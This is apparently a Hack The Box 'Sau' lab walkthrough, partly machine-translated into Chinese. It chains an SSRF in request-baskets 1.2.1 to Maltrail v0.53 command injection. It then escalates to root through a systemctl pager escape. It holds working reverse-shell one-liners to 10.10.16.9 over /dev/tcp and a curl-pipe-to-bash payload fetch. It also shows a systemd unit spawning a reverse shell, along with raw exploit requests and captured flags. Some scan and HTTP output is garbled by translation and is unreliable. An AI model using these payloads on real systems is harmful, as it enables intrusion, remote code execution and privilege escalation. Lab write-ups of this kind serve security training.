https://app.hackthebox.com/machines/Sau 
$ nmap -A 10.10.11.224 -T4
于2023 年7 月30 日15:36 HKT 启动Nmap 7.93 ( https://nmap.org )
10.10.11.224 (10.10.11.224) 的Nmap 扫描报告
主机已启动(0.66 秒延迟)。
未显示: 997 关闭tcp 端口(conn-refused)
港口国服务版本
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7(Ubuntu Linux;协议2.0)
| ssh-主机密钥:
|第3072章
| 256 ec2eb105872a0c7db149876495dc8a21(ECDSA)
|_ 256 b30c47fba2f212ccce0b58820e504336 (ED25519)
80/tcp 过滤http
55555/tcp 开放未知
|指纹字符串:
|四哦四请求:
| HTTP/1.0 400 错误请求
|内容类型: 文本/纯文本;字符集=utf-8
| X-Content-Type-Options: nosniff
|日期: 2023 年7 月30 日星期日07:39:48 GMT
|内容长度: 75
|无效的购物篮名称;该名称与模式: ^[wd-_\.]{1,250}$不匹配
| GenericLines、帮助、Kerberos、LDAPSearchReq、LPDString、RTSPRequest、SSLSessionReq、TLSSessionReq、TerminalServerCookie:
| HTTP/1.1 400 错误请求
|内容类型: 文本/纯文本;字符集=utf-8
|连接:关闭
|要求
|获取请求:
| HTTP/1.0 302 找到
|内容类型:文本/html;字符集=utf-8
|位置: /web
|日期: 2023 年7 月30 日星期日07:39:04 GMT
|内容长度: 27
| href='/web'找到/a.
|HTTPOptions:
| HTTP/1.0 200 好
|允许: GET、选项
|日期: 2023 年7 月30 日星期日07:39:07 GMT
|_ 内容长度: 0
尽管返回了数据,但仍无法识别1 个服务。如果您知道服务/版本,请在https://nmap.org/cgi-bin/submit.cgi?new-service : 提交以下指纹
$ sudo Masscan 10.10.11.224 -p1-65535 -i tun0 127
[sudo] kwkl 的密码:
抱歉,请重试。
[sudo] kwkl 的密码:
于2023 年7 月30 日07:38:54 GMT 启动Masscan 1.3.2 (http://bit.ly/14GZzcT)
启动SYN 隐形扫描
扫描1 台主机[65535 个端口/主机]
发现10.10.11.224 上开放端口55555/tcp
在10.10.11.224 
上发现开放端口22/tcp
请求篮子
X
HTTP 错误
关闭
X
已创建
篮子“a0xd3ro”已成功创建!
您的代币是: f4K8SVw1vHre3oJngvf8HElZoOgLGsoye3ka7fsOTWNm
关闭打开篮子
主令牌
此服务正在受限模式下运行。需要主代币才能创建新的篮子。
代币:
返回您的购物篮列表授权
新篮子
创建一个篮子来收集和检查HTTP 请求
http://10.10.11.224:55555/
a0xd3ro
创造
我的购物篮:
您还没有购物篮
由请求篮提供支持|版本: 1.2.1
[描述]
发现v1.2.1 之前的请求篮包含服务器端
通过组件/api/baskets/{name} 进行请求伪造(SSRF)。这
该漏洞允许攻击者访问网络资源并
通过精心设计的API 请求获取敏感信息。
------------------------------------------
[漏洞类型其他]
服务器端请求伪造(SSRF)
------------------------------------------
[产品供应商]
https://github.com/darklynx/request-baskets
------------------------------------------
[受影响的产品代码库]
请求篮-=版本1.2.1
------------------------------------------
[受影响的组件]
API 端点/api/baskets/{name} 和/baskets/{name} 容易通过forward_url 参数受到未经身份验证的服务器端请求伪造(SSRF) 攻击。
------------------------------------------
[攻击类型]
偏僻的
------------------------------------------
[权限影响升级]
真的
------------------------------------------
【影响力信息公开】
真的
------------------------------------------
[攻击媒介]
POC: POST /api/baskets/{name} API,带负载- {'forward_url': 'http://127.0.0.1:80/test','proxy_response': false,'insecure_tls': false,'expand_path': true,'capacity' : 250 }
详情可见: https://notes.sjtu.edu.cn/s/MUUhEymt7
------------------------------------------
[发现者]
甜菜1e
------------------------------------------
[参考]
http://请求篮子.com
https://github.com/darklynx/request-baskets
https://notes.sjtu.edu.cn/s/MUUhEymt7 
POST /api/baskets/q4tgdug2 HTTP/1.1
主机: 10.10.11.224:55555
内容长度: 147
接受: */*
X-Requested-With: XMLHttpRequest
授权: 空
User-Agent: Mozilla/5.0(X11;Linux x86_64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/106.0.0.0 Safari/537.36
产地: http://10.10.11.224:55555
参考: http://10.10.11.224:55555/web
Accept-Encoding: gzip、deflate
接受语言:zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
连接:关闭
{
'forward_url' : 'http://127.0.0.1:80/测试',
‘proxy_response’:假,
‘insecure_tls’: 错误,
‘expand_path’: 是的,
‘容量’ : 250
} 
HTTP/1.1 201 已创建
内容类型:应用程序/json;字符集=UTF-8
日期: 2023 年7 月30 日星期日12:35:31 GMT
内容长度: 56
连接:关闭
{'token':'PjX9v_Y5ZSuTSuCwpkFw_G8BoFFrI7pqdWfQzcuog1TI'}下次
POST /api/baskets/haha35 HTTP/1.1
主机: 10.10.11.224:55555
内容长度: 142
接受: */*
X-Requested-With: XMLHttpRequest
授权: 空
User-Agent: Mozilla/5.0(X11;Linux x86_64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/106.0.0.0 Safari/537.36
产地: http://10.10.11.224:55555
参考: http://10.10.11.224:55555/web
Accept-Encoding: gzip、deflate
接受语言:zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
连接:关闭
{
'forward_url' : 'http://127.0.0.1:80/',
‘proxy_response’: 正确,
‘insecure_tls’: 错误,
‘expand_path’: 是的,
‘容量’ : 250
}HTTP/1.1 201 已创建
内容类型:应用程序/json;字符集=UTF-8
日期: 2023 年7 月30 日星期日12:40:47 GMT
内容长度: 56
连接:关闭
{'令牌':'Z8tVZ90iX7iu7dgYpnv-HMc8CmDVtFVk39XkCPXD7L_0'} 
http://10.10.11.224:55555/哈哈35
altrail
文档
|
维基百科
|
问题
|
登录
小径
关闭
由Maltrail (v0.53) 提供支持
隐藏威胁
报告误报
https://nvd.nist.gov/vuln/detail/CVE-202
3-27163 https://github.com/spookier/Maltrail-v0.53-Exploit
POST /api/baskets/haha352 HTTP/1.1
Host: 10.10.11.224:55555
Content-Length: 147
Accept: */*
X-Requested-With: XMLHttpRequest
Authorization: null
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://10.10.11.224:55555
Referer: http://10.10.11.224:55555/web
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
{
"forward_url": "http://127.0.0.1:80/login",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
HTTP/1.1 201 Created
Content-Type: application/json; charset=UTF-8
Date: Sun, 30 Jul 2023 12:58:47 GMT
Content-Length: 56
Connection: close
{"token":"q8Urj-0YUEKHYxVTEGGmvKnPNpJN-vScNSmYuCfbmDRl"}┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666 1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
idhttp://10.10.11.224:55555/haha352
curl ‘http://10.10.11.224:55555/haha352’
–data ‘username=;bash -i >& /dev/tcp/10.10.16.9/6666 0>&1’
curl ‘http://10.10.11.224:55555/haha352’
–data ‘username=;http://10.10.16.9:5555/shell3.php | bash’
curl ‘http://10.10.11.224:55555/haha352’
–data ‘username=;curl http://10.10.16.9:5555/shell3.php | bash’
┌──(kwkl㉿kwkl)-[~/HODL/htb]
└─$ curl 'http://10.10.11.224:55555/haha352' \
--data 'username=;`curl http://10.10.16.9:5555/shell3.php | bash`'┌──(kwkl㉿kwkl)-[~]
└─$ nc -lvvp 6666 1 ⨯
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
id
Ncat: Connection from 10.10.11.224.
Ncat: Connection from 10.10.11.224:57512.
bash: cannot set terminal process group (887): Inappropriate ioctl for device
bash: no job control in this shell
puma@sau:/opt/maltrail$
puma@sau:/opt/maltrail$ id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ ls
ls
CHANGELOG
CITATION.cff
LICENSE
README.md
core
docker
h
html
maltrail-sensor.service
maltrail-server.service
maltrail.conf
misc
plugins
requirements.txt
sensor.py
server.py
thirdparty
trails
puma@sau:/opt/maltrail$
.puma@sau:~$ cat user.txt
cat user.txt
e8ea19ef627d286a17e25e0aa4420eb8
puma@sau:~$puma@sau:/opt/maltrail$ id
id
uid=1001(puma) gid=1001(puma) groups=1001(puma)
puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:/opt/maltrail$ ls -l /usr/bin/systemctl
ls -l /usr/bin/systemctl
-rwxr-xr-x 1 root root 996584 Mar 27 17:54 /usr/bin/systemctl
puma@sau:/opt/maltrail$
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x.x.x.x/xxx 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > mm.service
#生成的unit名位mm.serviceecho '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.16.9/9999 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > mm.service
#生成的unit名位mm.servicepuma@sau:~$ wget http://10.10.16.9:5555/mm.service
wget http://10.10.16.9:5555/mm.service
--2023-07-30 13:24:19-- http://10.10.16.9:5555/mm.service
Connecting to 10.10.16.9:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187 [application/octet-stream]
Saving to: ‘mm.service’
0K 100% 19.2M=0s
2023-07-30 13:24:21 (19.2 MB/s) - ‘mm.service’ saved [187/187]
puma@sau:~$ ls
ls
mm.service
user.txt
puma@sau:~$ mv mm.service /dev/shm
mv mm.service /dev/shm
puma@sau:~$ cat /dev/shm/mm.service
cat /dev/shm/mm.service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.16.9/9999 0>&1 2<&1"
[Install]
WantedBy=multi-user.target' > mm.service
#生成的unit名位mm.service
puma@sau:~$ sudo systemctl link /dev/shm/mm.service
sudo systemctl link /dev/shm/mm.service
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
puma@sau:~$ sudo systemctl enable --now /dev/shm/mm.service\
sudo systemctl enable --now /dev/shm/mm.service\
>
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
puma@sau:~$
puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:~$I can’t let it run
keep studying
puma@sau:/opt/maltrail$ sudo /usr/bin/systemctl status trail.service
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
- (press RETURN)!sh
!!sshh!sh
# id
!id
sh: 1: !id: not found
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd
cd
# ls
ls
go root.txt
# cat root.txt
cat root.txt
8bb88ff1298f508794168692c33aedb7
#sudo /usr/bin/systemctl status trail.service
Ref:
https://techyrick.com/sau-htb-writeup/
https://gtfobins.github.io/gtfobins/systemctl/
https://gtfobins.github.io
https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/
REF:
Then, we log in to the administrator background:
The following API’s forward_url parameter is vulnerable to SSRF:
/api/baskets/{name}/baskets/{name}Let’s take /api/baskets/{name} API as an example, another API is the same vulnerability.
We use the following payload to post /api/baskets/{name} API:
{
"forward_url": "http://127.0.0.1:80/test",
"proxy_response": false,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}
Direct post can only set the url, you need to visit the url - http://192.168.175.213:55555/test to trigger the SSRF vulnerability.
